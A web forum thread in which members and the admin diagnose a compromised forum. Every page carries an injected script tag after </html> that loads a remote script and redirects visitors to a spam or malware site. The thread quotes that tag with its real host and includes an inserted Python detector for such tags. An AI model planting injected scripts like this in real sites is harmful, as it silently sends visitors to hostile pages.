VGMaps
Author Topic: My anti virus program keeps saying there's a virus here.  (Read 17139 times)
Wario Bros
« on: May 02, 2010, 10:37:17 AM »

When I get on these forums, my anti virus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus."  I tell it to delete it but when I click on another section of the forums, that same warning message comes up.  Is this just me or is it happening to someone else as well?
« Last Edit: May 02, 2010, 02:42:20 PM by Wario Bros »

bustin98
« Reply #1 on: May 02, 2010, 10:49:13 AM »

What page is doing this?
marioman
« Reply #2 on: May 02, 2010, 10:51:50 AM »

All of them.  I just sent you a PM about this.
Revned
« Reply #3 on: May 02, 2010, 10:59:59 AM »

Hmm. At the very end of every page, after the </html> tag, is the following:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.

EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.
« Last Edit: May 02, 2010, 11:02:29 AM by Revned »

bustin98
« Reply #4 on: May 02, 2010, 11:09:25 AM »

Either my AntiVirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embedded in the code.
Revned
« Reply #5 on: May 02, 2010, 11:20:23 AM »

The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing.

The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S


EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:

   Domain Name: QOOGLESEARCH.COM
   Registrar: GODADDY.COM, INC.
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
   Status: ok
   Updated Date: 27-apr-2010
   Creation Date: 21-jan-2010
   Expiration Date: 21-jan-2011
« Last Edit: May 02, 2010, 11:24:06 AM by Revned »

Peardian
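A check for the kind of injection Revned describes above, added here as an example and not code from the thread or from SMF: it flags any script tag that sits after the closing </html> of a served page or of a template file on disk. The sample page and the host name inside it are constructed placeholders, not the real injected domain.

```python
import re
from pathlib import Path

# Constructed sample page: a <script> appended after </html>, the shape of the
# injection described in the thread. The host is a placeholder, not the real one.
INJECTED_PAGE = """<html><head><title>Forum</title></head>
<body><p>Welcome</p>
<script src="/js/forum.js"></script>
</body></html>
<script src="http://injected-host.invalid/kp.php"></script>
"""
# Same page without the appended tag (everything up to and including </html>).
CLEAN_PAGE = INJECTED_PAGE.split("</html>")[0] + "</html>\n"

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def trailing_scripts(html: str) -> list[str]:
    """Return the src of every <script> found after the last </html>.

    A normal template keeps its scripts inside <body>; anything after the
    closing tag is a strong sign the page or template was tampered with.
    Returns [] for clean pages and for pages with no </html> at all.
    """
    matches = list(CLOSE_HTML.finditer(html))
    if not matches:
        return []
    tail = html[matches[-1].end():]
    found = []
    for tag in SCRIPT_TAG.finditer(tail):
        src = SRC_ATTR.search(tag.group(0))
        found.append(src.group(1) if src else "<inline script>")
    return found


def scan_tree(root: str, exts=(".php", ".html", ".htm", ".tpl")) -> dict[str, list[str]]:
    """Walk a web root (e.g. the forum's template files) and map each file
    that carries a script after </html> to the script sources it loads."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            srcs = trailing_scripts(path.read_text(errors="replace"))
            if srcs:
                hits[str(path)] = srcs
    return hits
```

Running `trailing_scripts` over the output of a plain `wget` of each page, as Revned did, catches the served-page case; `scan_tree` on the web root points at the template or PHP file that was edited.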
« Reply #6 on: May 02, 2010, 01:11:06 PM »

That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.
bustin98
« Reply #7 on: May 02, 2010, 01:15:03 PM »

I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.

EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.
« Last Edit: May 02, 2010, 02:18:54 PM by bustin98 »
Wario Bros
« Reply #8 on: May 02, 2010, 02:30:36 PM »

That's good to hear!  BTW, I no longer get that virus message anymore.  I'm kinda surprised how fast this was handled.

Revned
« Reply #9 on: May 02, 2010, 02:36:35 PM »

Did you save the infected files for further inspection? This might just happen again if you don't find the cause.

bustin98
« Reply #10 on: May 02, 2010, 02:38:12 PM »

Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.

EDIT: We are thinking the same.
Maxim
« Reply #11 on: May 03, 2010, 12:34:48 AM »

If you have any files or directories that are world-writable then other people on your shared server can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.

(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)
Maxim
« Reply #12 on: May 03, 2010, 12:38:17 AM »

Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.
bustin98
« Reply #13 on: May 03, 2010, 09:50:31 AM »

Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.
Revned
« Reply #14 on: May 03, 2010, 10:43:46 AM »

Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.